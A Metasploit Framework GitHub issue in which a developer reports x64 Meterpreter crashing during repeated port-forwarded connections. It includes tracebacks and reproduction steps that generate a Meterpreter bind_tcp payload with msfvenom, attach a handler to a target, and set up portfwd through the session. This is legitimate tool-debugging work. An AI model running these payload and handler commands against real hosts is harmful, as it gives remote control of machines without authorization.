Open asoto-r7 opened 6 years ago
I recreated this in a fresh environment and it's still happening. I also get a traceback in msfconsole
which conveniently duplicates #10160, so we'll ignore that.
Also, I get a traceback afterward Meterpreter dies, which may be an after-effect and not anything actually helpful. But just in case:
msf5 exploit(windows/license/sentinel_lm7_udp) > [*] 192.168.1.11 - Meterpreter session 3 closed. Reason: Died
Interrupt: use the 'exit' command to quit
msf5 exploit(windows/license/sentinel_lm7_udp) > #<Thread:0x00007f7ed0729498@/home/administrator/git/r7/metasploit-framework/lib/msf/core/thread_manager.rb:93 run> terminated with exception (report_on_exception is true):
Traceback (most recent call last):
7: from /home/administrator/git/r7/metasploit-framework/lib/msf/core/thread_manager.rb:100:in `block in spawn'
6: from /home/administrator/git/r7/metasploit-framework/lib/rex/thread_factory.rb:22:in `block in spawn'
5: from /var/lib/gems/2.5.0/gems/rex-core-0.1.13/lib/rex/io/socket_abstraction.rb:121:in `block in monitor_rsock'
4: from /var/lib/gems/2.5.0/gems/rex-core-0.1.13/lib/rex/io/socket_abstraction.rb:121:in `loop'
3: from /var/lib/gems/2.5.0/gems/rex-core-0.1.13/lib/rex/io/socket_abstraction.rb:188:in `block (2 levels) in monitor_rsock'
2: from /home/administrator/git/r7/metasploit-framework/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_client_channel.rb:90:in `close_write'
1: from /home/administrator/git/r7/metasploit-framework/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_client_channel.rb:106:in `shutdown'
/home/administrator/git/r7/metasploit-framework/lib/rex/post/meterpreter/packet_dispatcher.rb:177:in `send_request': Operation timed out. (Rex::TimeoutError)
TL;DR: This is still an issue.
Run on attacker VM:
msfvenom -p windows/x64/meterpreter/bind_tcp LHOST=ATTACKER_IP_ADDRESS -f exe -o bind_tcp_192.168.199.134_4444.exe
msfconsole -qx 'handler -p windows/x64/meterpreter/bind_tcp -H TARGET_IP_ADDRESS -P 4444
background
sessions -C 'portfwd add -r 216.146.43.71 -p 80 -l 8000'
Launch the bind_tcp payload on a Win10 x64 box:
On another terminal on the attacker box:
while true; do curl 127.0.0.1:8000; sleep 1; done
Observe the above traceback.
ADDENDUM: In addition to the above traceback (which just kills the remote Meterpreter process and reports a timeout), we have another exception if the address we're trying to connect to doesn't respond:
#<Thread:0x00007f1b980b16b0@/home/administrator/git/r7/metasploit-framework/lib/msf/core/thread_manager.rb:93 run> terminated with exception (report_on_exception is true):
Traceback (most recent call last):
17: from /home/administrator/git/r7/metasploit-framework/lib/msf/core/thread_manager.rb:100:in `block in spawn'
16: from /home/administrator/git/r7/metasploit-framework/lib/rex/thread_factory.rb:22:in `block in spawn'
15: from /var/lib/gems/2.5.0/gems/rex-core-0.1.13/lib/rex/io/socket_abstraction.rb:121:in `block in monitor_rsock'
14: from /var/lib/gems/2.5.0/gems/rex-core-0.1.13/lib/rex/io/socket_abstraction.rb:121:in `loop'
13: from /var/lib/gems/2.5.0/gems/rex-core-0.1.13/lib/rex/io/socket_abstraction.rb:188:in `block (2 levels) in monitor_rsock'
12: from /home/administrator/git/r7/metasploit-framework/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_client_channel.rb:90:in `close_write'
11: from /home/administrator/git/r7/metasploit-framework/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_client_channel.rb:106:in `shutdown'
10: from /home/administrator/git/r7/metasploit-framework/lib/rex/post/meterpreter/packet_dispatcher.rb:172:in `send_request'
9: from /home/administrator/git/r7/metasploit-framework/lib/rex/post/meterpreter/packet_dispatcher.rb:200:in `send_packet_wait_response'
8: from /home/administrator/git/r7/metasploit-framework/lib/rex/post/meterpreter/packet_dispatcher.rb:133:in `send_packet'
7: from /home/administrator/git/r7/metasploit-framework/lib/rex/post/meterpreter/packet.rb:823:in `to_r'
6: from /home/administrator/git/r7/metasploit-framework/lib/rex/post/meterpreter/packet.rb:823:in `call'
5: from /home/administrator/git/r7/metasploit-framework/lib/rex/post/meterpreter/packet.rb:595:in `to_r'
4: from /home/administrator/git/r7/metasploit-framework/lib/rex/post/meterpreter/packet.rb:453:in `each'
3: from /home/administrator/git/r7/metasploit-framework/lib/rex/post/meterpreter/packet.rb:453:in `each'
2: from /home/administrator/git/r7/metasploit-framework/lib/rex/post/meterpreter/packet.rb:596:in `block in to_r'
1: from /home/administrator/git/r7/metasploit-framework/lib/rex/post/meterpreter/packet.rb:323:in `to_r'
/home/administrator/git/r7/metasploit-framework/lib/rex/post/meterpreter/packet.rb:323:in `pack': no implicit conversion of nil into Integer (TypeError)
In my testing, as little as 5 repeated connections, spaced apart by 5 seconds, caused x64 Meterpreter to crash.
It's possible this is related to some Meterpreter issues with
portfwd
, but I have no evidence to support/contradict that theory yet.Steps to reproduce
Drop a
windows/x64/meterpreter/bind_tcp
payload, in my case on a Windows 10 x64 target (fully patched).In
msfconsole
, runhandler -p windows/x64/meterpreter/bind_tcp -H TARGET_IP_ADDRESS -P 4444
Setup a forwarded port, in my case to rapid7.com:
sessions -C 'portfwd add -r 52.85.208.191 -p 80 -l 8000'
In a new terminal, set netcat to slowly simmer:
i=1; while true; do echo -n "ATTEMPT $i: "; nc -zn 127.0.0.1 8000; sleep 5; let i=$i+1; echo; done
Wait for
Meterpreter session 1 closed. Reason: Died
.Note: Ignore the tracebacks, they're part of the above, cited Meterpreter issue:
Click here for (potentially unrelated) tracebacks
``` /Users/asoto/git/r7/metasploit-framework/lib/rex/post/meterpreter/packet.rb:323:in `pack': no implicit conversion of nil into Integer (TypeError) #